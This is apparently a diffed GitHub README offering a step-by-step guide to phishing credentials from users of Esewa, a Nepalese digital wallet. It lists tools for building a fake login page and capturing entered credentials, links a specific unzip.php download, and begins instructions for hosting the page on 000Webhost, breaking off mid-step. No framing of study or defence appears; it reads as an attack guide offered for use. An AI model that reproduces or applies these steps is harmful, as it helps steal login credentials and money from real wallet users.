BijayaTamangShyangtan/EsewaHackingPhishing/README.md

 # Esewa Exploiting: Credential Phishing on 000Webhost (With Script Download)

 This guide will walk you through the process of exploiting Esewa, a popular digital wallet in Nepal, using a credential phishing attack.
 We will be using 000Webhost as our web hosting service and downloading a script to automate the unzipping process.
-## Prerequisites

-Before beginning this attack, you will need the following tools and resources:
-* A phishing framework or method for creating a fake Esewa login page.
-This can be as simple as creating a basic HTML page and hosting it on a web server, or you can use a more advanced tool such as [Spoof](https://github.com/drk1wi/Spoof) or [Modlishka](https://github.com/drk1wi/Modlishka).
-* A way to capture the user's credentials once they are entered on the fake login page.
-This can be done using a tool such as [Burp Suite](https://portswigger.net/burp) or [Wireshark](https://www.wireshark.org/) to intercept and analyze network traffic.
-* A free account on [000Webhost](https://www.00webhost.com/).
-* The repository files and the `unzip.php` file from [this link](https://github.com/<USERNAME>/Esewa-Phishing/archive/refs/heads/main.zip).

 ## Steps

-1. Download the repository files and the `unzip.php` file from the provided link.
+1. Download the repository files and the `unzip.php` file from the provided link https://github.com/BijayaTamangShyangtan/Files/blob/main/File/unzip.php
 2. Unzip the downloaded repository files.
 3. Host the fake login page on 000Webhost.
 Here are the steps to do this:
     a.
 Sign up for a free account on 000Webhost.